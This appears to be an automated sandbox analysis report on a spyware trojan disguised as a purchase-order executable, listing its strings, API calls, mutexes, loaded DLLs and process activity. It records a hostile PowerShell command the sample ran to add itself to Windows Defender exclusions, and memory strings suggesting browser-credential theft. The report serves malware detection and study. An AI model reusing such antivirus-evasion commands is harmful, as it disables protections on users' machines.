Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, J---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, J---.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c7f050.4.raw.unpack, J---.cs	Base64 encoded string: 'KWRVsNJa7mk/oSuy2WfCkJjef7DgvfIcJ9l2tJhRpe7qa6fDVQRFScVnsdwZVygn'
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.4c3ba30.3.raw.unpack, J---.cs	Base64 encoded string: 'KWRVsNJa7mk/oSuy2WfCkJjef7DgvfIcJ9l2tJhRpe7qa6fDVQRFScVnsdwZVygn'

Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, yODdwInPYQcLcICvfM.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, yODdwInPYQcLcICvfM.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, yODdwInPYQcLcICvfM.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, BXfOJmeNvhyHxF6xHc.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.77d0000.6.raw.unpack, BXfOJmeNvhyHxF6xHc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1531945426.0000000006249000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb<

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/16@3/4

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Mutant created: \Sessions\1\BaseNamedObjects\XlUPkZePZTQsgTLLJydQbYD
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7468

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kxnz5kp2.rrh.ps1

Jump to behavior

Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe, 00000004.00000002.1527211447.0000000002C10000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Virustotal: Detection: 28%
Source: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

File read: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process created: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7468 -s 2428
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process created: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe "C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
